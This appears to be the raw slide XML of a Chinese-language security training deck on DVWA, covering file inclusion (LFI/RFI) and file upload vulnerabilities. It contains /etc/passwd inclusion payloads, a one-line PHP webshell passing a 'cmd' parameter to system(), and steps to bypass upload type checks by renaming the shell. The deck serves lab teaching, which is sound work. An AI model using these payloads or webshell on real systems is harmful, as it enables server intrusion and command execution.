              <a:t>Local File inclusion(LFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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17253" y="5103108"/>
            <a:ext cx="6981825" cy="4883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/>
              <a:t>Remote  File inclusion(RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="上-下雙向箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419725" y="3841053"/>
            <a:ext cx="285750" cy="48374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385470" y="4082923"/>
            <a:ext cx="103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協定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2660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340" y="2537786"/>
            <a:ext cx="6394332" cy="381358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2"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="向右箭號 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175435" y="3185160"/>
            <a:ext cx="1567640" cy="9372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LFI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漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743074" y="2444605"/>
            <a:ext cx="6455597" cy="1705489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628650" y="966434"/>
            <a:ext cx="7886700" cy="4756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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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etc/passwd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628650" y="1843855"/>
            <a:ext cx="7886700" cy="4756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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page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=file:/</a:t>
            </a:r>
            <a:r>
              <a:rPr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/etc/passwd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上-下雙向箭號 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061585" y="1356051"/>
            <a:ext cx="285750" cy="48374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610212" y="5245831"/>
            <a:ext cx="3533788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DVWA_1.10_high</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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203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-142874" y="-57150"/>
            <a:ext cx="92868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 smtClean="0"/>
              <a:t>File Upload vulnerability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37547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-142874" y="-57150"/>
            <a:ext cx="92868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 smtClean="0"/>
              <a:t>File Upload vulnerability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73607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175" y="1551814"/>
            <a:ext cx="6398988" cy="490667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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="向右箭號 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294888" y="3857864"/>
            <a:ext cx="840259" cy="76611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點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>選</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58432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63" y="1418784"/>
            <a:ext cx="4731282" cy="390019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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/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5231995" y="1785053"/>
            <a:ext cx="3671887" cy="24929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TW" sz="1200" dirty="0"/>
              <a:t>&lt;form action="" method="get"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>Command: &lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>" /&gt;&lt;input type="submit" value="submit" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>Output:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>&lt;pre&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>']))    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>(    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
              <a:t>'])</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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TW" sz="1200" dirty="0"/>
              <a:t>&lt;/pre&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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5231995" y="1484971"/>
            <a:ext cx="915635" cy="3000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1350" dirty="0" smtClean="0"/>
              <a:t>shell1.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/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149162" y="5494196"/>
            <a:ext cx="7886700" cy="378491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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/upload/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149162" y="6340317"/>
            <a:ext cx="7886700" cy="333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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/upload/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackable/uploads/shell1.php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向下箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894374" y="5872687"/>
            <a:ext cx="396275" cy="492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815920" y="3392976"/>
            <a:ext cx="2474729" cy="1615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746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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t> 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94" y="1524066"/>
            <a:ext cx="6307930" cy="481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05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92" y="1358442"/>
            <a:ext cx="7943850" cy="53929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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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65171" y="4272946"/>
            <a:ext cx="4377693" cy="2861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673564" y="3659832"/>
            <a:ext cx="852153" cy="2293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804119" y="5192463"/>
            <a:ext cx="449360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程式碼做了檔案類型(jpg,png)與大小的限制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690155" y="3589858"/>
            <a:ext cx="101181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上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>php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15999" y="5694949"/>
            <a:ext cx="7845342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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Is it an image? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    if( ( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" || $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" ) &amp;&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        ( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> &lt; 100000 ) ) {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333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874" y="2145340"/>
            <a:ext cx="6934200" cy="46101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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr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187799" y="1245210"/>
            <a:ext cx="1821305" cy="378491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smtClean="0"/>
              <a:t>shell2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.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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187799" y="2234821"/>
            <a:ext cx="1911457" cy="333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 smtClean="0"/>
              <a:t>shell2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.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900313" y="1683053"/>
            <a:ext cx="396275" cy="492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414095" y="1744595"/>
            <a:ext cx="263245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將webshell先修改副檔名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4525547"/>
            <a:ext cx="1429555" cy="2795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091008" y="4480655"/>
            <a:ext cx="93166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上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>jpg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68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97487"/>
            <a:ext cx="9144000" cy="899794"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4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inclusion vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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https://en.wikipedia.org/wiki/File_inclusion_vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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6689" y="4277378"/>
            <a:ext cx="8467725" cy="204722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/>
              <a:t>如果沒有對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檔案來源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>進行嚴格審查，就會導致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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任意檔案讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者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任意命令執行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/>
              <a:t>分為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本地檔包含漏洞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(LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>遠端檔包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>(RFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>遠端檔包含漏洞是因為開啟了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>配置中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>選項（選項開啟之後，伺服器允許包含一個遠端的檔）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166687" y="1331456"/>
            <a:ext cx="8682038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Inclusion[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檔案包含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  <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>當伺服器開啟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>選項時，就可通過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的某些特性函數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>[include()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>require()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>include_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>()]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>去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動態包含文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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962" y="3562490"/>
            <a:ext cx="4625562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inclusion vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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4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83"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="224162" y="6147101"/>
            <a:ext cx="8412339" cy="586687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="內容版面配置區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82" y="1322906"/>
            <a:ext cx="7886700" cy="4304427"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="向下箭號 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471244" y="5547659"/>
            <a:ext cx="482570" cy="6084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3799460" y="5178772"/>
            <a:ext cx="1545078" cy="2540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3719577" y="6290669"/>
            <a:ext cx="2034669" cy="2201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內容版面配置區 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344538" y="4767942"/>
            <a:ext cx="2931061" cy="3784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 smtClean="0"/>
              <a:t>filename=shell2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.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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內容版面配置區 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344538" y="5757553"/>
            <a:ext cx="2931061" cy="333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 smtClean="0"/>
              <a:t>filename=shell2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.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057052" y="5205785"/>
            <a:ext cx="396275" cy="492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36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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_Medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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37" y="1394406"/>
            <a:ext cx="6467475" cy="46101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61"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921022" y="4549461"/>
            <a:ext cx="5362575" cy="204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9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標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="103530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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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DVWA_1.10_HIGH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File Upload Source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369744" y="1863110"/>
            <a:ext cx="8404512" cy="34163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</a:rPr>
              <a:t>    // File information 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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = $_FILES[ 'uploaded' ][ 'name' ]; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>strrpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, '.' ) + 1); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = $_FILES[ 'uploaded' ][ 'size' ]; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  = $_FILES[ 'uploaded' ][ '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>' ]; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Is it an image?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t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    if( ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
